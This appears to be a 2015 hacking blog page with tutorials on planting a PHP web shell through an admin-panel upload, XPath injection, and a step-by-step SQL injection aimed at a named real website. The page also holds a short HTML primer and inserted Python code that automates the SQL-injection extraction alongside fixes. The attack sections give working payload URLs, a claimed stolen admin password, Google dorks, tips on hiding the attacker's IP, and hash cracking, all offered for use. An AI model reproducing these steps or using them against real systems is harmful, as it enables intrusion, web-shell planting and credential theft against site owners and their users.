
Saturday, 10 January 2015

[Tutorial] Uploading Shell From Admin Panel

A complete tutorial on Uploading Shell From Admin Panel on Security Bots.

Things you need -

1. Access to the admin panel of the website.
2. A PHP web shell (you can find one with Google).
3. The Mozilla Firefox browser.
4. The Live HTTP Headers Firefox add-on (also easy to find with Google).


!! FOR EDUCATIONAL PURPOSES ONLY !!

So lets start with our tutorial -

1. First log in to the admin panel of the website and look for a place where you can upload a file (image, PDF, DOC, etc.). In my case I found a gallery in the target site where images can be uploaded.
2. Now we will upload the shell, but first rename it to 'shell.php.jpg', because the form expects an image. Whether the rest of this works depends on where the extension check runs: if only the browser (or the page's JavaScript) checks the name, the server stores whatever filename the request carries, which is exactly what the replay below exploits; if the server itself checks the extension, renaming the file in a replayed request will not get past it.
3. Before uploading 'shell.php.jpg', open Live HTTP Headers, minimise it, and then click the upload button, as in the following image.



4. Now that 'shell.php.jpg' has been uploaded, maximise Live HTTP Headers and find the request containing 'shell.php.jpg' in the headers box, as in the image below.


5. Click the line in which 'shell.php.jpg' is written, then click Replay.
6. After clicking Replay a new window opens. The second box holds the request body; find 'shell.php.jpg' there (it is the filename in the Content-Disposition line of the multipart part), change it to 'shell.php' and press Replay again, as in the image below.


7. The shell has now been uploaded under its real name. Right-click the second image in the gallery and choose 'Copy image location' to get the shell's URL, as in the image below.
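The replay in steps 3 to 7 only changes the filename inside the multipart body the browser already sent. The following added example, which is not from the original page, models both ends of that exchange in Python: build_upload constructs the form-data body the gallery form would send, store_trusting_client models a server whose only extension check ran in the browser (the situation the replay exploits), and store_hardened shows the server-side checks that defeat it. The boundary string, the field name "image" and the extension/magic-byte table are assumptions made for this example.

```python
import re
import secrets

# Assumed values: the boundary and form field name are placeholders chosen
# for this example, not taken from the page or any real site.
BOUNDARY = "----ReplayBoundary7e3f"
FIELD = "image"


def build_upload(filename, content, boundary=BOUNDARY):
    """Build the multipart/form-data body a browser sends for one file field.

    Editing `filename` here is what the Live HTTP Headers replay does by hand:
    the bytes of the file do not change, only the name in the part header.
    """
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{FIELD}"; filename="{filename}"\r\n'
        f"Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail


def parse_upload(body, boundary=BOUNDARY):
    """Minimal parser written for this example: return (filename, bytes) of
    the first file part in a multipart body."""
    for part in body.split(f"--{boundary}".encode()):
        if b"filename=" not in part:
            continue
        headers, _, data = part.partition(b"\r\n\r\n")
        name = re.search(rb'filename="([^"]*)"', headers).group(1).decode()
        if data.endswith(b"\r\n"):          # CRLF that precedes the next boundary
            data = data[:-2]
        return name, data
    raise ValueError("no file part in body")


def store_trusting_client(body):
    """Models the gallery from the tutorial: the only extension check ran in
    the browser, so the server keeps whatever filename the request carries.
    Returns the name the file would be saved under."""
    name, _ = parse_upload(body)
    return name


# Allow-listed extensions and the magic bytes a genuine file of that type starts with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def store_hardened(body):
    """Server-side checks that survive a replayed request: allow-list the
    final extension, verify the content's magic bytes, and choose the stored
    name on the server. Returns the stored name, or None when rejected."""
    name, data = parse_upload(body)
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext not in ALLOWED:
        return None                         # e.g. "shell.php"
    if not data.startswith(ALLOWED[ext]):
        return None                         # e.g. PHP source named "shell.php.jpg"
    # Server-chosen name: no client-controlled string reaches the filesystem,
    # so a double extension cannot survive the upload. The upload directory
    # should still have script execution disabled, because a valid image can
    # carry PHP after its header.
    return f"{secrets.token_hex(8)}.{ext}"
```

Run store_trusting_client on build_upload("shell.php", ...) to see the replayed name accepted verbatim; store_hardened rejects the same body, and rejects PHP source named shell.php.jpg because its first bytes are not a JPEG header.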



XPath Injection Tutorial

What Is XPath Injection 


Description

XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database. 

XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow a malicious user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source. 

XPath is a language that has been designed and developed primarily to address parts of an XML document. In XPath injection testing, we test if it is possible to inject data into an application so that it executes user-controlled XPath queries. When successfully exploited, this vulnerability may allow an attacker to bypass authentication mechanisms or access information without proper authorization.

Short Description of the Issue

Web applications heavily use databases to store and access the data they need for their operations. Historically, relational databases have been by far the most common technology for data storage, but, in the last years, we are witnessing an increasing popularity for databases that organize data using the XML language. Just like relational databases are accessed via SQL language, XML databases use XPath as their standard query language. Since, from a conceptual point of view, XPath is very similar to SQL in its purpose and applications, an interesting result is that XPath injection attacks follow the same logic as SQL Injection attacks. In some aspects, XPath is even more powerful than standard SQL, as its whole power is already present in its specifications, whereas a large number of the techniques that can be used in a SQL Injection attack depend on the characteristics of the SQL dialect used by the target database. This means that XPath injection attacks can be much more adaptable and ubiquitous. Another advantage of an XPath injection attack is that, unlike SQL, no ACLs are enforced, as our query can access every part of the XML document.

Black Box testing and example

The XPath attack pattern was first published by Amit Klein and is very similar to the usual SQL Injection. In order to get a first grasp of the problem, let's imagine a login page that manages the authentication to an application in which the user must enter his/her username and password. Let's assume that our database is represented by the following XML file:

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
  <user>
    <username>gandalf</username>
    <password>!c3</password>
    <account>admin</account>
  </user>
  <user>
    <username>Stefan0</username>
    <password>w1s3c</password>
    <account>guest</account>
  </user>
  <user>
    <username>tony</username>
    <password>Un6R34kb!e</password>
    <account>guest</account>
  </user>
</users>
An XPath query that returns the account whose username is "gandalf" and the password is "!c3" would be the following: 

string(//user[username/text()='gandalf' and password/text()='!c3']/account/text()) 


If the application does not properly filter user input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values: 

Username: ' or '1' = '1
Password: ' or '1' = '1

Looks quite familiar, doesn't it? Using these parameters, the query becomes: 

string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text()) 

As in a common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even though no username or password was provided. Note the precedence: in XPath 'and' binds tighter than 'or', so the predicate reads username='' or ('1'='1' and password='') or '1'='1', and the final '1'='1' makes it true for every <user> node. string() then returns the account of the first matching node, here gandalf's 'admin'.

And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message. If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack, whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information. 
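The login check above, as an added example that is not part of the original text: login_vulnerable builds the predicate by string concatenation exactly as the page describes, login_safe binds the values as XPath variables (the approach lxml offers through tree.xpath(expr, u=..., p=...)), and quote_probe performs the single-quote test from the last paragraph. Because the standard library has no XPath engine that handles 'and'/'or' predicates, the evaluator here is a small toy written for this example; it covers only the subset used by the predicate (child/text() steps, string literals, '=', 'and', 'or' with XPath 1.0 precedence, and $variables), and it is an assumption of the example, not a real XPath implementation.

```python
import re
import xml.etree.ElementTree as ET

# The users file from the section above, embedded so the example runs offline.
USERS_XML = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
  <user><username>gandalf</username><password>!c3</password><account>admin</account></user>
  <user><username>Stefan0</username><password>w1s3c</password><account>guest</account></user>
  <user><username>tony</username><password>Un6R34kb!e</password><account>guest</account></user>
</users>"""

# Tokens of the XPath subset this toy evaluator understands:
# 'literal', $variable, child/text(), '=' and the keywords and/or.
_TOKEN = re.compile(r"\s*(?:('[^']*')|(\$\w+)|(\w+)/text\(\)|(=)|\b(and|or)\b)")


def _tokenize(expr):
    tokens, pos = [], 0
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if m is None:
            if not expr[pos:].strip():
                break
            raise SyntaxError(f"invalid XPath near {expr[pos:pos + 12]!r}")
        pos = m.end()
        lit, var, path, eq, kw = m.groups()
        if lit is not None:
            tokens.append(("str", lit[1:-1]))   # XPath 1.0 literals have no escapes
        elif var is not None:
            tokens.append(("var", var[1:]))
        elif path is not None:
            tokens.append(("path", path))
        elif eq is not None:
            tokens.append(("=", "="))
        else:
            tokens.append(("kw", kw))
    return tokens


def _truth(value):
    """XPath boolean(): a string is true when non-empty, a boolean is itself."""
    return value if isinstance(value, bool) else bool(value)


class _Eval:
    """Recursive-descent evaluator: or_expr := and_expr ('or' and_expr)*,
    so 'and' binds tighter than 'or', as in XPath 1.0."""

    def __init__(self, tokens, node, variables):
        self.t, self.i, self.node, self.vars = tokens, 0, node, variables

    def peek(self):
        return self.t[self.i] if self.i < len(self.t) else (None, None)

    def take(self):
        if self.i >= len(self.t):
            raise SyntaxError("unexpected end of XPath expression")
        tok = self.t[self.i]
        self.i += 1
        return tok

    def or_expr(self):
        value = self.and_expr()
        while self.peek() == ("kw", "or"):
            self.take()
            right = self.and_expr()          # always parsed, even when left is true
            value = _truth(value) or _truth(right)
        return value

    def and_expr(self):
        value = self.eq_expr()
        while self.peek() == ("kw", "and"):
            self.take()
            right = self.eq_expr()
            value = _truth(value) and _truth(right)
        return value

    def eq_expr(self):
        left = self.primary()
        if self.peek() == ("=", "="):
            self.take()
            return left == self.primary()
        return left

    def primary(self):
        kind, value = self.take()
        if kind == "str":
            return value
        if kind == "var":
            return self.vars[value]           # bound value, never re-parsed
        if kind == "path":
            return self.node.findtext(value) or ""
        raise SyntaxError(f"unexpected token {value!r}")


def evaluate(predicate, node, variables=None):
    """Evaluate the predicate against one <user> element, as //user[...] would."""
    ev = _Eval(_tokenize(predicate), node, variables or {})
    result = ev.or_expr()
    if ev.i != len(ev.t):
        raise SyntaxError("trailing tokens in XPath expression")
    return _truth(result)


def load_users():
    return ET.fromstring(USERS_XML)


def login_vulnerable(root, username, password):
    """The page's login: user input concatenated straight into the query."""
    predicate = f"username/text()='{username}' and password/text()='{password}'"
    for user in root.findall("user"):
        if evaluate(predicate, user):
            return user.findtext("account")   # string(...) returns the first match
    return None


def login_safe(root, username, password):
    """Fix: bind the values as XPath variables so they are never parsed."""
    predicate = "username/text()=$u and password/text()=$p"
    for user in root.findall("user"):
        if evaluate(predicate, user, {"u": username, "p": password}):
            return user.findtext("account")
    return None


def quote_probe(root, value):
    """First test step from the text: does this input cause a query error?"""
    try:
        login_vulnerable(root, value, "x")
    except SyntaxError:
        return True
    return False
```

With the injected value from the text in both fields, login_vulnerable returns 'admin' (gandalf is the first node and the predicate is true for all of them), while login_safe returns None because the bound strings are compared as whole values.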

An Introduction to HTML

Welcome to Security Bots. Here is a tutorial/introduction on HTML.

HTML is a markup language for describing web documents (web pages).
  • HTML stands for Hyper Text Markup Language
  • A markup language is a set of markup tags
  • HTML documents are described by HTML tags
  • Each HTML tag describes different document content

HTML Example

Small HTML document

<!DOCTYPE html>
<html>
<body>

<h1>My First Heading</h1>

<p>My first paragraph.</p>

</body>
</html>


Example Explained

  • The DOCTYPE declaration defines the document type
  • The text between <html> and </html> describes the web document
  • The text between <body> and </body> describes the visible page content
  • The text between <h1> and </h1> describes a heading
  • The text between <p> and </p> describes a paragraph
Using the description, a web browser can display a document with a heading and a paragraph.

HTML Tags

HTML tags are keywords (tag names) surrounded by angle brackets:
<tagname>content</tagname>
  • HTML tags normally come in pairs like <p> and </p>
  • The first tag in a pair is the start tag, the second tag is the end tag
  • The end tag is written like the start tag, but with a slash before the tag name.

Step-By-Step SQL Injection Tutorial




Here's a definition for SQL injection. According to Wikipedia ,


SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

Before we start:



There are a few things I recommend you use, and install when performing SQLi Attacks. They are either vital, or extremely helpful when executing your injection.

  • VPN (Virtual Private Network)
  • Firefox with the "Hackbar" addon
  • Patience


Beginning with the most important, I will explain what each item is for. A VPN, in short, routes your traffic through another server, so the target site sees that server's IP address instead of yours. This gives you more protection when hacking, as any IP address you leave behind is harder to trace (but not impossible). I recommend proXPN: go to their website, make a free account, and you're good to go.


Secondly, Firefox. It's not really Firefox I love, but its Hackbar add-on. Install the two and you'll see what I mean; it will come in handy later.


And finally, patience. There are quite a few steps in this, and it doesn't always work. Just keep working at it, and you'll get it.


Finding our site - Vulnerabilities:



In order to perform the injection, we need to find a vulnerable site. Although you can get lucky with plain Google searches, there are special search strings (dorks) that surface likely-vulnerable pages more easily. The way you find these sites is by typing any of the dorks into Google. Here are those dorks/codes.



Go ahead and tap one into Google, and you'll get a multitude of sites. For my example, I will be using This site.


To test whether a site is vulnerable, append an apostrophe to the URL, right after the id number:




If an error is thrown, the site is vulnerable. Here's an example:


Quote:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


You've got a site, let's move on!


Working out the number of Columns:



Columns? In what? The page's PHP runs a SELECT against its MySQL database, and the result of that query has a fixed number of columns (the fields in its select list). They can range from 1 upwards and can be named anything the administrator wants. We need to know this number because a UNION only works when our injected SELECT returns exactly as many columns as the original one, and because we then need to find out which of those columns are displayed. To do this, we use the 'order by' clause.


So, we take our URL without the apostrophe on the end and append 'order by 1--'. The two dashes comment out whatever the application's query has after our input, which is vital for the command to work. MySQL only treats '--' as a comment when it is followed by a space, and a trailing space is easily lost in a URL, so if it fails use '--+' (the '+' becomes a space) or '#' instead. So it would be like so:




Now, continue to increment (increase) the number until an error comes up. This is where Hackbar comes in handy, as you can just highlight the number in the URL and press the '+' button until the error is thrown.




An error came up at 12, which means column 12 doesn't exist. That means, you guessed it, there are 11 columns on this database (Note, it varies for every website you do, yours may not necessarily be 11). Make a note of the number of columns. And as a helpful hand, this is what the error may look like:





Finding out the vulnerable column:



So, we now know there are 11 columns in the query. What we now need to do is work out which column is reflected in the page, and can therefore carry the injection's output. Once again we use a command, but slightly different. Firstly, at the end of our URL there are numbers (173). We need to add a '-' before this number, but after the equals. This makes the original query match no row (there is no id -173), so the only row the page renders is the one our UNION will supply.




Note: I am not sure, but I believe you can, instead of inserting '-', replace all the numbers with 'null'. If somebody could confirm this for me, that'd be great!


Now, we will use a command called 'union all select'. A UNION appends the rows of a second SELECT to the first one's results, and only works when both return the same number of columns, which is why we counted them. So list every column number from 1 to 11 separated by commas, like so:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select 1,2,3,4,5,6,7,8,9,10,11--



The webpage should then throw some numbers. This one gives me 1,2,7 and 11. They will be apparent to you, for example in bold writing, but they are scattered around the place. My page looks like this:



You can take any of these numbers, but I recommend taking the first one you see for simplicity's sake. To put it simply, that number is the column whose value the page displays, so it is where we will place everything we want to read out from now on.


Checking the version number:



This is not a hard rule, but the rest of this tutorial relies on the information_schema database, which exists only in MySQL 5.0 and later; on 4.x you would have to guess table and column names instead. Checking the version is very simple. Refer to the number you chose from the previous step. Take that number, and follow these steps to the letter. I have chosen number 1, in case you were wondering.


In the URL, you have the numbers. The number you have chosen should be in that set of numbers. Now, what you have to do, is take the number you chose and replace it with '@@version'. So, I chose the number '1' as it was the first that the 'union all select' command showed, so I replace it with the version command.


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select @@version,2,3,4,5,6,7,8,9,10,11--


After executing, a version number should appear where it previously had your number. Like this:





My database version is '5.1.54-0.dotdeb.0'.


And yes! The MySQL version for this site is 5 or higher. The first number is all you need to worry about; as long as it is 5 or more, information_schema is available and you're good to go. Next up, we've got to find the name of the actual database.


Finding the main database's name:



database() returns the name of the database (schema) the vulnerable query runs against, which is where the tables we are after live. We need it later in the tutorial, so listen closely.


Firstly, take your URL, and where it says '@@version', replace it with 'concat(database())'.


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select concat(database()),2,3,4,5,6,7,8,9,10,11--



A new page should load, and some text should appear where the database version was. This will usually differ from site to site, as the name is chosen by whoever set the site up. Mine looks like so and is called 'Future_future2'.




And that's it, we have the name of the database. Make a note of it in Notepad! We will need it again!


Displaying the database's tables:



Now we have the database name, we are good to move onto the next part: Displaying the tables. The tables are what's inside the database, and contain all the data. To view them, we use a few commands. First, we add 'group' to 'concat(database())', and change 'database()' to 'table_name', like so:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(table_name),2,3,4,5,6,7,8,9,10,11--


We then need to add a FROM clause telling MySQL where to read table names from. It goes after the number sequence and reads 'from information_schema.tables where table_schema=database()--'. information_schema is MySQL's built-in catalogue: information_schema.tables lists every table the database user can see, and the WHERE clause limits it to the current database. Like so:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(table_name),2,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--



At this point, all of the tables will appear. One caveat: group_concat() output is truncated at group_concat_max_len, which defaults to 1024 bytes, so on a site with many tables the list may be cut off; narrow it with a WHERE clause on table_name, or drop group_concat and page through the rows with LIMIT.


Now, you'll want to make a note of all of those table names, for later reference. It's very important you do so. A recommendation, put it in the same text file as the database name, just two (or so) paragraphs under.


Entering the tables - Viewing their content:



Now, we have the database name, all of the main table names, and now we need to find the information from the correct table. The one we're looking for is the one with worthwhile information. Usually, it will be called something like 'users, usernames, info, userinfo', etc. On this site, mine is 'users'.


So, what you want to do is find that table. Now we need a command to list its columns, but first we need a hexadecimal (HEX) converter. The table name has to be supplied as a string, and writing it in quotes ('users') often fails because the application escapes quotes (addslashes/magic_quotes); MySQL accepts a 0x-prefixed hex literal as a string, so the quotes can be avoided altogether. There are many converters; here are my two favourites, and I recommend the top one:



  • xLate (However, the HEX has spaces in. The spaces need to be removed between each number)



The command is as follows. You change 'group_concat(table_name)' to 'group_concat(column_name)', and 'information_ schema.tables' to 'information_schema.columns'. We also change 'table_schema' to 'table_name'. On top of this, after the equals, we add in 0x and then the HEX Number, which I am about to get onto.


We need to use TextToHex to convert the name of the table, with worthwhile information in (Mine was users), to a HEX value. To do this, just type in the name of the table, and boom, done. We then add that value after the 0x. Confusing? Look below:


users = 7573657273 in HEX


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(column_name),2,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x7573657273--



Once again this gives us names, but this time they are the column names of the 'users' table, and there should be far fewer of them. I was given four, and the two I'm interested in are 'username' and 'password'. Your column names may not always be the same; it varies between sites. Sometimes you may have picked the wrong table and get columns that are of no use. You have to be persistent, and patient, and keep trying.




Entering the table content - Viewing their data:



Now, we've got a lot of data so far, but there are only four pieces we need now:

  • Database name - Future_future2
  • Main table - users
  • Two columns - username, password


Now, we want to find out what is inside username, and password. What you need to do, is this:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(contentName),2,3,4,5,6,7,8,9,10,11 from databaseName.mainTable--


So, first you need to fill in the placeholders (contentName, databaseName, mainTable) with your own data. Mine would change to:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(username),2,3,4,5,6,7,8,9,10,11 from Future_future2.users--


By executing this, you would be given the data inside 'username'.


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(password),2,3,4,5,6,7,8,9,10,11 from Future_future2.users--


And then the data inside 'password'. I now have the Admin Login, and am nearly done. Hopefully, so are you!


Username: admin
Password: foilcore


Sometimes the passwords are not stored in clear text but as hashes (MD5 is common on older sites). A hash cannot be decrypted, only cracked: lookup services such as MD5Decrypter.com hold precomputed hashes of common passwords, and tools like hashcat or John the Ripper can brute-force the rest.
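The whole procedure from 'Working out the number of Columns' to 'Viewing their data', automated as an added example that is not from the original tutorial. SQLite stands in for MySQL so it runs offline: the catalogue table is sqlite_master instead of information_schema.tables, the version function is sqlite_version() instead of @@version, and char(117,115,101,114,115) takes the place of the 0x7573657273 hex trick; the injection logic is otherwise the same. The table layout, the id 173 and the credentials are constructed sample data, fin_detail is a deliberately vulnerable model of the page, and fin_detail_safe is the parameterised fix.

```python
import re
import sqlite3


def make_db():
    """Constructed sample database standing in for the site in the text."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE fins(id INTEGER, name TEXT, material TEXT, price TEXT);"
        "INSERT INTO fins VALUES (173, 'Thruster', 'fibreglass', '99');"
        "CREATE TABLE users(id INTEGER, username TEXT, password TEXT);"
        "INSERT INTO users VALUES (1, 'admin', 'example-pw');"
    )
    return con


def render(row):
    """Only name and price reach the HTML, so only those columns are visible."""
    return "not found" if row is None else f"<h1>{row[1]}</h1><p>{row[3]}</p>"


def fin_detail(con, id_param):
    """Vulnerable page (fin-detail.php?id=...): the id is spliced into the SQL text."""
    sql = f"SELECT id, name, material, price FROM fins WHERE id = {id_param}"
    try:
        return render(con.execute(sql).fetchone())
    except sqlite3.OperationalError as exc:
        return f"SQL error: {exc}"          # the 'error is thrown' signal from the text


def fin_detail_safe(con, id_param):
    """Fixed page: the value is bound to a placeholder and never parsed as SQL."""
    try:
        wanted = int(id_param)
    except ValueError:
        return "not found"
    row = con.execute(
        "SELECT id, name, material, price FROM fins WHERE id = ?", (wanted,)
    ).fetchone()
    return render(row)


# ---- attacker side: the tutorial's steps as functions over a page(param) callable ----

def count_columns(page, real_id, limit=32):
    """ORDER BY n errors as soon as n exceeds the SELECT's column count."""
    for n in range(1, limit + 1):
        if "error" in page(f"{real_id} order by {n}--").lower():
            return n - 1
    raise RuntimeError("column count above limit")


def reflected_columns(page, real_id, ncols):
    """Negate the id so the real query matches nothing, UNION a row of distinct
    markers, and see which of them the template prints."""
    markers = ",".join(f"'m{i}m'" for i in range(1, ncols + 1))
    html = page(f"-{real_id} union all select {markers}--")
    return [i for i in range(1, ncols + 1) if f"m{i}m" in html]


def extract(page, real_id, ncols, col, expr, from_clause=""):
    """Place `expr` in reflected column `col`, wrapped in sentinels so it can be
    cut out of the HTML. SQLite concatenates with ||; MySQL would use concat()."""
    cols = [f"'m{i}m'" for i in range(1, ncols + 1)]
    cols[col - 1] = f"'[[' || ({expr}) || ']]'"
    html = page(f"-{real_id} union all select {','.join(cols)}{from_clause}--")
    found = re.search(r"\[\[(.*?)\]\]", html, re.S)
    return found.group(1) if found else None


def run_attack(page, real_id="173"):
    """Column count, reflected column, version, tables, columns, then data."""
    ncols = count_columns(page, real_id)
    reflected = reflected_columns(page, real_id, ncols)
    col = reflected[0]

    def grab(expr, from_clause=""):
        return extract(page, real_id, ncols, col, expr, from_clause)

    return {
        "columns": ncols,
        "reflected": reflected,
        "version": grab("sqlite_version()"),              # @@version in MySQL
        # MySQL: group_concat(table_name) from information_schema.tables where table_schema=database()
        "tables": grab("group_concat(name)", " from sqlite_master where type='table'"),
        # char(117,115,101,114,115) spells 'users' without quotes, the SQLite
        # counterpart of the 0x7573657273 literal used for MySQL in the text;
        # the stored DDL reveals the column names
        "users_ddl": grab("sql", " from sqlite_master where name=char(117,115,101,114,115)"),
        "creds": grab("group_concat(username || ':' || password)", " from users"),
    }
```

Call run_attack(lambda p: fin_detail(con, p)) to see the column count, the reflected columns, the table list and the credentials come back; point it at fin_detail_safe and every payload simply yields "not found", because the bound parameter is never interpreted as SQL.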


Finding the Administrator's Login Page:



This is either going to be the easiest, or hardest bit of the tutorial so far. The Login page is usually the home page, with an extra bit added to the end. The most common include:

  • /admin
  • /admin.php
  • /login
  • /login.php


The list goes on; just use trial and error.


Unfortunately, my site has a protection on the admin login. I cannot bypass this (I don't think), so cannot access the Admin Panel.


If you are having difficulty finding the page, there are a multitude of Python scripts, and more which can be used to find the page. I recommend using them, as they're sometimes faster, and easier.